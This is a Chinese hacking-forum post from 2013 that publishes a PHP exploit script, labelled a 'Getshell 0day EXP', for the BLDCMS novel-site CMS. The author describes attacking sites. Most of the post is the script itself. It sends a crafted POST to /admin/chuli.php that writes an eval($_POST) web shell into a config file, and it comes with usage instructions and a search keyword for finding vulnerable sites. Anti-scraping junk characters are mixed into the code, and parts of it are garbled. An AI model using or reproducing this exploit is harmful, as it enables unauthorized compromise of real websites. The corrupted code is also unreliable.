找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2320|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
' Y5 j9 e4 \. J. m3 D0 V5 K8 `' D; P& L; N
' @8 q* C( D0 ^* q
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 & }2 D% y) q( t
; @& X" ^/ G/ q
既然都有人发了 我就把我之前写好的EXP放出来吧. S7 p! m, ]0 e* F$ I! s

! N: s* E5 J2 L$ Z2 b0 e# q8 fview source print?01.php;">" U' V. o$ J0 l+ Q$ m# C
02.<!--?php
: v. C( O# [) X7 p4 J03.echo "-------------------------------------------------------------------0 o( h7 ~, `4 y  Z
04.
/ M' g* q5 l9 O' Q05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP' ?8 i- t% _7 U- I' j6 W8 D
06. / N" \4 p2 E3 I6 A3 b' _
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun  \) T6 ]" I; j* `0 {$ i
08. 9 ^8 @9 s+ _+ e; k% U/ ~3 f
09.QQ:981009941\r\n                                2013.3.21\r\n             " v2 Q7 Y# W6 }1 Q3 l0 G; D
10. " [- C' f" A$ z2 p) T4 S
11. 7 Y% M1 q8 |3 V+ q
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码; x8 A7 \. ^2 O  z; b6 v' w
13. 0 I4 g' P: I' \+ X) A
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 g% _4 L( s, L& }; C$ a5 Y+ ]0 t4 O15.
9 \8 D+ k/ L" h2 {: x- @" K$ J0 r16.--------------------------------------------------------------------\r\n";+ r; Z0 W1 d9 y: o) [) \
17.$url=$argv[1];
9 ?" v8 C4 A( P- I. f* X3 G18.$dir=$argv[2];- z* [4 Z* P; J4 F  \
19.$pass=$argv[3];
8 B9 }1 \" u; I- ~3 V20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
: S  J+ X( l+ o3 O+ G21.if (emptyempty($pass)||emptyempty($url))
8 Y+ j) N" L- \22.{exit("请输入参数");}
+ h0 L* w, r! I0 d% C23.else
& Y4 `  M! ~  B$ S& w, O* a24.{
; w' s4 p$ W, n9 U. a25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
0 D& _1 {' \$ U2 z26.
6 N7 U: j' p$ m6 z+ D- J27.al;% T. `* S- ]% k. E
28.$length = strlen($fuckdata);0 W0 {* t4 h& A! f) n/ V
29.function getshell($url,$pass)
% ~& E6 Y7 [5 B* J  a1 j30.{
: [9 ~6 k! F9 r* ]# |31.global $url,$dir,$pass,$eval,$length,$fuckdata;
0 p7 @7 F# f0 W6 ?9 K& K32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
% y2 U; t, W& M5 n/ b" j33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
, Z4 m& w8 {) U34.$header .= "User-Agent: MSIE\r\n";
6 x% T9 O# r+ f0 M0 K1 g35.$header .= "Host:".$url."\r\n";
+ Q  T) ~' D, ]$ N" h36.$header .= "Content-Length: ".$length."\r\n";% l7 s6 j. r7 r
37.$header .= "Connection: Close\r\n";- y$ z8 Z' n; {0 ~) c
38.$header .="\r\n";0 P- ?8 p( g- T: y1 V/ U
39.$header .= $fuckdata."\r\n\r\n";) H) B4 a2 i- a9 Q
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
5 w5 {7 o, h1 G: h9 s41.if (!$fp)
  n) k4 e; r8 Q* c# \42.{
- [8 R5 ^4 u+ F( k6 l/ |: m43.exit ("利用失败:请检查指定目标是否能正常打开");( s+ V6 m. m% J" D% P3 L
44.}6 A9 O% b3 j% y
45.else{ if (!fputs($fp,$header))+ m' D$ W' H- ]4 v3 D8 O% L" ?
46.{exit ("利用失败");}: ]$ ^. c; A0 n
47.else# g% h( ^' g# o1 ^) j" b* t8 j
48.{7 D5 y8 G* h* e: \! c' q
49.$receive = '';
1 y- `2 _2 `6 N/ ^4 }1 w. X5 ~50.while (!feof($fp)) {  o3 ^! ^+ g$ U2 G4 Q' o
51.$receive .= @fgets($fp, 1000);2 M0 \* }& T# I
52.}( _1 }! ?. B# a( r6 Z- i# t
53.@fclose($fp);  n% ~* U5 `5 _4 l( G: B
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
  x" r( I1 J, {8 s; w6 r55. , ?: x' h$ n) [0 v( {7 q7 M
56.GPC是否=off)";
. l& O  c# F6 M( z9 ]5 d! p57.}}
' K0 J- {  E, K) Z! x! d# H58.}
0 M' H# T$ X  t) \7 M6 [59.}) t- G' v1 w1 Z& l! E( H, v
60.getshell($url,$pass);
" E7 Y* K3 N  D  w$ `4 @/ j61.?-->1 i, b/ x! n( }' X/ R( P
8 M% h4 f/ W4 }% ^

& L: d8 ^/ u% b, [ % v0 M2 R, ^" u6 l" a- s7 T. |
by 数据流
/ C( y4 F6 c. u( }7 G  i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表